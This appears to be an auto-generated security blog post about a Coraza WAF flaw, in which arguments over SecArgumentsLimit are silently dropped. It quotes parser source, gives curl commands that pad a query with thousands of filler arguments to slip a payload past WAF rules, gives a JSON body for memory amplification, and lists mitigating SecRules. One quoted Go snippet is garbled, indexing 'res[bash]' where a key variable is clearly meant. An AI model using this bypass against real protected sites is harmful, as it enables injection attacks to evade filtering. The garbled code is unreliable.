Listen to this Post
Coraza enforces SecArgumentsLimit.
Default value is 1000.
AddGetRequestArgument checks argument limit.
AddPostRequestArgument checks argument limit.
AddPathRequestArgument checks argument limit.
When limit reached, function returns silently.
No error variable is set.
No transaction flag is raised.
No rule can observe drop.
ExtractGetArguments parses query string.
urlutil.ParseQuery returns Go map.
Go map iteration order randomized.
Surviving arguments are non-deterministic.
Attacker pads URI with filler.
Payload may be silently discarded.
ARGS rules cannot see payload.
ARGS_GET rules cannot see payload.
ARGS_NAMES rules cannot see payload.
urlencoded POST processor writes ARGS_POST directly.
It bypasses checkArgumentLimit.
ARGS_POST grows unbounded.
This enables bypass and memory-DoS.
ModSecurity v3 has same silent-drop.
ModSecurity query parser is ordered.
Tail of query drops deterministically.
ModSecurity ships rule id:200007.
Coraza ships no equivalent rule.
Coraza exploitable out-of-the-box.
Bypass rate scales as (N-limit)/N.
10000 args gives ~94% bypass.
JSON body processor ignored limit.
JSON array flattening amplified memory.
Array-length write skipped byteBudget.
Long nested keys amplified bytes.
3.8.1 holds array-length to byte budget.
3.8.0 fix was incomplete.
DailyCVE Form:
Platform: Coraza WAF
Version: v3.0.0-v3.8.1
Vulnerability: ArgLimit bypass
Severity: High 7.2
date: 2026-10-02
Prediction: 2026-07-28
(end of form)
What Undercode Say:
Analytics:
grep -R "ArgumentLimit" internal/corazawaf grep -R "checkArgumentLimit" internal grep -R "ParseQuery" internal go test ./... -race go vet gofmt golangci-lint
func (tx Transaction) AddGetRequestArgument(key string, value string) {
if tx.checkArgumentLimit(tx.variables.argsGet) {
tx.debugLogger.Warn().Msg("skipping get request argument, over limit")
return
}
tx.variables.argsGet.Add(key, value)
}
func (tx Transaction) checkArgumentLimit(c collections.NamedCollection) bool {
return c.Len() >= tx.WAF.ArgumentLimit
}
values := urlutil.ParseQuery(b, '&')
argsCol := v.ArgsPost()
for k, vs := range values {
argsCol.Set(k, vs)
}
curl -s -o /dev/null -w '%{http_code}\n' 'http://127.0.0.1:8090/?evil=ATTACK_HERE_XYZ'
args=""
for i in $(seq 1 9999); do args+="&f$i=x"; done
curl -s -o /dev/null -w '%{http_code}\n' "http://127.0.0.1:8090/?evil=ATTACK_HERE_XYZ${args}"
const keyLen = 20000
const depth = 200
body := `{"` + strings.Repeat("a", keyLen) + `":` + strings.Repeat("[", depth) + strings.Repeat("]", depth) + `}`
res, truncated, err := readJSON(body, 1024, 1000)
Exploit: (Educational Purposes!)
SecRuleEngine On SecRule ARGS "@contains ATTACK_HERE_XYZ" "id:9001,phase:2,deny,status:403,msg:'Attack detected'"
curl -s -o /dev/null -w '%{http_code}\n' 'http://127.0.0.1:8090/?evil=ATTACK_HERE_XYZ'
403
args=""
for i in $(seq 1 9999); do args+="&f$i=x"; done
curl -s -o /dev/null -w '%{http_code}\n' "http://127.0.0.1:8090/?evil=ATTACK_HERE_XYZ${args}"
bool Transaction::addArgument(...) {
if (m_rules->m_argumentsLimit.m_set
&& m_variableArgs.size() >= m_rules->m_argumentsLimit.m_value) {
ms_dbg(4, "Skipping request argument, over limit (...)");
return false;
}
...
}
if arrayLen > 0 {
if argumentLimit > 0 && argCount >= argumentLimit {
iterationTruncated = true
} else {
k := string(objKey)
lenStr := strconv.Itoa(arrayLen)
res[bash] = append(res[bash], lenStr)
usedBytes += len(objKey) + len(lenStr)
argCount++
}
}
Protection: from this CVE
SecRule &ARGS_GET "@ge 1000" \ "id:200007,phase:2,t:none,log,deny,status:400,msg:'ARGS_GET over SecArgumentsLimit; request partially parsed'" SecRule &ARGS_POST "@ge 1000" \ "id:200008,phase:2,t:none,log,deny,status:400,msg:'ARGS_POST over SecArgumentsLimit; request partially parsed'" SecRule &ARGS_PATH "@ge 1000" \ "id:200009,phase:2,t:none,log,deny,status:400,msg:'ARGS_PATH over SecArgumentsLimit; request partially parsed'"
SecRule ARGUMENTS_LIMIT_REACHED "@eq 1" \ "id:200006,phase:1,t:none,log,deny,status:413,msg:'Argument limit reached; request rejected'"
SecRule &ARGS_GET "@ge 1000" \ "id:200007,phase:2,t:none,log,deny,status:400,msg:'Failed to fully parse request body due to large argument count',severity:2"
Upgrade to 3.8.1 3.8.0 listed as affected Route urlencoded through AddPostRequestArgument Use ParseQueryOrdered for deterministic drops Set ARGUMENTS_LIMIT_REACHED on every drop Enforce ArgumentLimit in urlencoded processor Enforce ArgumentLimit in JSON processor Enforce byteBudget on array-length write Set REQBODY_ERROR over byte budget Use Map.TotalValues() not Len()
Impact:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L (7.2, High) Attack Complexity Low Availability Low Integrity Low Confidentiality not scored separately Scope Changed
1000 (at limit): 0 / 50 (0.0%) 1001 (1 over): 0 / 2000 (<0.1%) 1100 (100 over): 45 / 500 (9.0%) 2000 (1000 over): 106 / 200 (53.0%) 10000 (10× limit): 47 / 50 (94.0%)
ARGS bypass ARGS_GET bypass ARGS_NAMES bypass ARGS_GET_NAMES bypass ARGS_PATH bypass SQLi CRS evasion XSS CRS evasion RCE CRS evasion LFI CRS evasion Memory DoS ARGS_POST unbounded growth JSON flattening amplification RESPONSE_ARGS affected
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

